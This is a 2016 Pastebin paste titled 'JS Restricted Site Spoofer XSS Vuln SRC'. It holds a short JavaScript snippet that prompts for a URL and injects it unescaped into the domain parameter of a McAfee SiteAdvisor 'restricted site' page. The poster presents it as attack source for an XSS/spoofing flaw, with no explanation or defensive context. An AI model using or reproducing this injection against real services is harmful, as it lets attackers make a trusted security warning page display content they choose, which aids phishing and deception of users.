BrU32

JS Restricted Site Spoofer XSS Vuln SRC

Sep 14th, 2016
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <script>
  2. var URL=prompt('Enter URL:');
  3. window.open('http://www.siteadvisor.com/restricted.html?domain='+URL+'&originalURL=418230&pip=true&premium=false&client_uid=3372442654&client_ver=4.0.3.233&client_type=IEPlugin&suite=true&aff_id=0&locale=en_us&ui=1&os_ver=6.2.0.0');
  4. </script>
Add Comment
Please, Sign In to add comment